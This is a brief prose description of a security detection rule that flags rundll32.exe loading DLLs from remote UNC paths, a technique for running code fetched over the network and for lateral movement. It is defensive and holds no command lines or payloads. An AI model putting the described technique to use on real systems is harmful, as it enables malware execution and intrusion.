This detection rule identifies the use of rundll32.exe, a Windows utility that executes functions in DLLs, when such DLLs are located on remote UNC paths. This behavior is often utilized by attackers as a method to deploy malicious payloads from remote locations, serving as a technique to evade detection by executing untrusted code from untrusted sources. The rule watches for specific command line arguments indicative of UNC path usage, along with normal characteristics of the rundll32 execution. The detection is categorized as high severity due to the potential for execution of malware in the context of the system. It is pertinent to monitor system processes and their behaviors closely to enhance security posture against execution methods leveraged for lateral movement within networks.